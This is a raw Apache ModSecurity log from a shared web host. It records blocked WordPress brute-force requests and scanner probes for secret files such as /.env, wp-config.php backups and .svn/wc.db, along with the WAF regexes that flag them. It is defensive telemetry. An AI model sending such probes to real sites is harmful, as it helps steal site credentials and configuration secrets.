[Tue May 26 13:37:56.938467 2026] [security2:error] [pid 536875:tid 537109] [client 195.178.110.34:35666] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVU3Or_-FTveSGlx1HgVAAAAO0"]
[Tue May 26 13:37:57.568154 2026] [security2:error] [pid 536875:tid 537113] [client 106.192.248.115:59365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU3er_-FTveSGlx1HgYQAAAPE"]
[Tue May 26 13:37:57.568371 2026] [security2:error] [pid 536875:tid 537113] [client 106.192.248.115:59365] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU3er_-FTveSGlx1HgYQAAAPE"]
[Tue May 26 13:37:57.895650 2026] [security2:error] [pid 536875:tid 537007] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU3er_-FTveSGlx1HgZAAAAIc"]
[Tue May 26 13:37:58.825006 2026] [security2:error] [pid 536875:tid 536905] [remote 45.250.255.226:44574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVU3ur_-FTveSGlx1HgfgAAoB0"]
[Tue May 26 13:37:59.359455 2026] [security2:error] [pid 536875:tid 537017] [client 195.178.110.34:35672] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVU3-r_-FTveSGlx1HgjQAAAJE"]
[Tue May 26 13:38:00.148873 2026] [security2:error] [pid 536875:tid 537046] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU3-r_-FTveSGlx1HgmAAAAK4"]
[Tue May 26 13:38:00.558373 2026] [security2:error] [pid 536875:tid 537112] [client 129.222.147.134:38915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU4Or_-FTveSGlx1HgsQAAAPA"]
[Tue May 26 13:38:00.558493 2026] [security2:error] [pid 536875:tid 537112] [client 129.222.147.134:38915] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU4Or_-FTveSGlx1HgsQAAAPA"]
[Tue May 26 13:38:00.571889 2026] [security2:error] [pid 536875:tid 537118] [client 45.148.10.62:34438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env"] [unique_id "ahVU4Or_-FTveSGlx1HgtQAAAPY"]
[Tue May 26 13:38:01.269328 2026] [security2:error] [pid 536875:tid 537018] [client 45.148.10.62:51662] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.bak"] [unique_id "ahVU4er_-FTveSGlx1Hg1AAAAJI"]
[Tue May 26 13:38:01.688406 2026] [security2:error] [pid 536875:tid 537094] [client 195.178.110.34:35672] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.chettinadavenue.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVU4er_-FTveSGlx1Hg8QAAAN4"]
[Tue May 26 13:38:02.158015 2026] [security2:error] [pid 536875:tid 537050] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU4er_-FTveSGlx1Hg9QAAALI"]
[Tue May 26 13:38:02.206086 2026] [security2:error] [pid 536875:tid 537017] [client 45.148.10.62:51662] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/backend/.env"] [unique_id "ahVU4ur_-FTveSGlx1HhCAAAAJE"]
[Tue May 26 13:38:02.416509 2026] [security2:error] [pid 536875:tid 537103] [client 45.148.10.62:51662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/test.php"] [unique_id "ahVU4ur_-FTveSGlx1HhDQAAAOc"]
[Tue May 26 13:38:02.748519 2026] [security2:error] [pid 536875:tid 537031] [client 45.148.10.62:51670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.backup"] [unique_id "ahVU4ur_-FTveSGlx1HhIAAAAJ8"]
[Tue May 26 13:38:03.028415 2026] [security2:error] [pid 536875:tid 537023] [client 45.148.10.62:51670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.orig"] [unique_id "ahVU4-r_-FTveSGlx1HhLQAAAJc"]
[Tue May 26 13:38:03.297657 2026] [security2:error] [pid 536875:tid 537044] [client 45.148.10.62:51670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env.old"] [unique_id "ahVU4-r_-FTveSGlx1HhWAAAAKw"]
[Tue May 26 13:38:03.638523 2026] [security2:error] [pid 536875:tid 537031] [client 45.148.10.62:51670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/.env.php.bak"] [unique_id "ahVU4-r_-FTveSGlx1HhawAAAJ8"]
[Tue May 26 13:38:04.210161 2026] [security2:error] [pid 536875:tid 537062] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU4-r_-FTveSGlx1HhcwAAAL4"]
[Tue May 26 13:38:04.494278 2026] [security2:error] [pid 536875:tid 537084] [client 45.148.10.62:51910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/.env.php"] [unique_id "ahVU5Or_-FTveSGlx1HhiAAAANQ"]
[Tue May 26 13:38:05.798043 2026] [security2:error] [pid 536875:tid 536951] [remote 101.99.50.238:51726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.50.99.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVU5er_-FTveSGlx1HhsgAA9Us"]
[Tue May 26 13:38:06.152841 2026] [security2:error] [pid 536875:tid 537084] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU5er_-FTveSGlx1HhvAAAANQ"]
[Tue May 26 13:38:06.249331 2026] [security2:error] [pid 536875:tid 537041] [client 45.148.10.62:51914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/wp-config.php"] [unique_id "ahVU5ur_-FTveSGlx1Hh2gAAAKk"]
[Tue May 26 13:38:07.158966 2026] [security2:error] [pid 536875:tid 537068] [client 45.148.10.62:44242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujoverseas.in"] [uri "/wp-config.php.old"] [unique_id "ahVU5-r_-FTveSGlx1HiJQAAAMQ"]
[Tue May 26 13:38:07.819469 2026] [security2:error] [pid 536875:tid 537085] [client 45.148.10.62:44246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/config.php"] [unique_id "ahVU5-r_-FTveSGlx1HiMgAAANU"]
[Tue May 26 13:38:07.905801 2026] [security2:error] [pid 536875:tid 537023] [client 106.192.248.115:59665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU5-r_-FTveSGlx1HiNwAAAJc"]
[Tue May 26 13:38:07.907237 2026] [security2:error] [pid 536875:tid 537023] [client 106.192.248.115:59665] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU5-r_-FTveSGlx1HiNwAAAJc"]
[Tue May 26 13:38:08.267204 2026] [security2:error] [pid 536875:tid 537051] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU5-r_-FTveSGlx1HiNAAAALM"]
[Tue May 26 13:38:08.451522 2026] [http2:info] [pid 544395:tid 544395] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:38:08.467481 2026] [security2:error] [pid 536875:tid 537036] [client 45.148.10.62:44254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/config.php.bak"] [unique_id "ahVU6Or_-FTveSGlx1HiSAAAAKQ"]
[Tue May 26 13:38:08.943753 2026] [security2:error] [pid 544395:tid 544527] [client 47.149.153.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU6Bmrs7g3RMCdp8XDGwAAAAI"]
[Tue May 26 13:38:09.961225 2026] [security2:error] [pid 536875:tid 537011] [client 45.148.10.62:44256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/phpinfo.php"] [unique_id "ahVU6er_-FTveSGlx1HiXQAAAIs"]
[Tue May 26 13:38:10.167044 2026] [security2:error] [pid 544395:tid 544396] [remote 103.82.194.131:36970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.194.82.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVU6Rmrs7g3RMCdp8XDJAAADgA"]
[Tue May 26 13:38:10.487699 2026] [security2:error] [pid 536875:tid 536983] [remote 91.210.171.209:40460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVU6ur_-FTveSGlx1HifQAAiWs"]
[Tue May 26 13:38:10.584482 2026] [security2:error] [pid 544395:tid 544552] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU6hmrs7g3RMCdp8XDKwAAABs"]
[Tue May 26 13:38:10.786800 2026] [security2:error] [pid 544395:tid 544554] [client 129.222.147.134:41340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU6hmrs7g3RMCdp8XDOgAAAB0"]
[Tue May 26 13:38:10.786922 2026] [security2:error] [pid 544395:tid 544554] [client 129.222.147.134:41340] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU6hmrs7g3RMCdp8XDOgAAAB0"]
[Tue May 26 13:38:11.497539 2026] [security2:error] [pid 536875:tid 537095] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU6-r_-FTveSGlx1HijQAAAN8"], referer: https://www.anujtradingco.com/
[Tue May 26 13:38:11.842635 2026] [security2:error] [pid 536875:tid 536955] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVU6-r_-FTveSGlx1HikwAAm08"]
[Tue May 26 13:38:11.842808 2026] [security2:error] [pid 536875:tid 537027] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVU6-r_-FTveSGlx1HikwAAm08"]
[Tue May 26 13:38:11.939838 2026] [security2:error] [pid 544395:tid 544591] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU6xmrs7g3RMCdp8XDQwAAAEI"]
[Tue May 26 13:38:11.971230 2026] [security2:error] [pid 536875:tid 537031] [client 74.7.228.18:53434] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnaenterprises.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVU6-r_-FTveSGlx1HilQAAn2Y"]
[Tue May 26 13:38:12.111858 2026] [security2:error] [pid 544395:tid 544609] [client 74.7.175.175:56928] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnawoodworks.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVU7Bmrs7g3RMCdp8XDTgAAVHg"]
[Tue May 26 13:38:12.178469 2026] [security2:error] [pid 536875:tid 537120] [client 74.7.241.174:57386] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnawoodworks.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVU7Or_-FTveSGlx1HimAAA-F8"]
[Tue May 26 13:38:12.606868 2026] [security2:error] [pid 544395:tid 544624] [client 107.152.47.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7Bmrs7g3RMCdp8XDVwAAAGM"], referer: https://www.anujtradingco.com/
[Tue May 26 13:38:12.732809 2026] [security2:error] [pid 536875:tid 537011] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7Or_-FTveSGlx1HipQAAAIs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 13:38:13.139434 2026] [fcgid:warn] [pid 536875:tid 537041] (70014)End of file found: [client 199.45.155.103:3276] mod_fcgid: can't get data from http client
[Tue May 26 13:38:13.161369 2026] [security2:error] [pid 544395:tid 544650] [client 107.152.47.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7Rmrs7g3RMCdp8XDZQAAAH0"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1484001&moderation-hash=258bb255a626c6bac27660aa1c8f1610
[Tue May 26 13:38:14.071235 2026] [security2:error] [pid 536875:tid 537082] [client 153.75.250.147:49156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "earthone.me"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahVU7er_-FTveSGlx1HizAAAANI"]
[Tue May 26 13:38:14.810397 2026] [security2:error] [pid 544395:tid 544584] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU7hmrs7g3RMCdp8XDfQAAADs"]
[Tue May 26 13:38:15.873467 2026] [security2:error] [pid 536875:tid 537034] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVU7-r_-FTveSGlx1Hi8gAAAKI"], referer: https://anujtradingco.com
[Tue May 26 13:38:16.037585 2026] [security2:error] [pid 544395:tid 544642] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU7xmrs7g3RMCdp8XDnwAAAHU"]
[Tue May 26 13:38:16.424603 2026] [security2:error] [pid 536875:tid 537039] [client 65.21.124.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVU7-r_-FTveSGlx1Hi6wAAAKc"]
[Tue May 26 13:38:16.688829 2026] [fcgid:warn] [pid 536875:tid 537101] (70014)End of file found: [client 66.132.195.121:24332] mod_fcgid: can't get data from http client
[Tue May 26 13:38:18.388047 2026] [security2:error] [pid 536875:tid 537062] [client 106.192.248.115:59973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU8ur_-FTveSGlx1HjLQAAAL4"]
[Tue May 26 13:38:18.392217 2026] [security2:error] [pid 536875:tid 537062] [client 106.192.248.115:59973] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU8ur_-FTveSGlx1HjLQAAAL4"]
[Tue May 26 13:38:18.629009 2026] [security2:error] [pid 544395:tid 544627] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU8hmrs7g3RMCdp8XD9wAAAGY"]
[Tue May 26 13:38:19.822474 2026] [security2:error] [pid 536875:tid 537130] [client 66.132.195.121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVU8-r_-FTveSGlx1HjPgAAAQI"]
[Tue May 26 13:38:20.578114 2026] [security2:error] [pid 536875:tid 537022] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU9Or_-FTveSGlx1HjVwAAAJY"]
[Tue May 26 13:38:21.151315 2026] [security2:error] [pid 536875:tid 537072] [client 129.222.147.134:47693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU9er_-FTveSGlx1HjdwAAAMg"]
[Tue May 26 13:38:21.151465 2026] [security2:error] [pid 536875:tid 537072] [client 129.222.147.134:47693] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU9er_-FTveSGlx1HjdwAAAMg"]
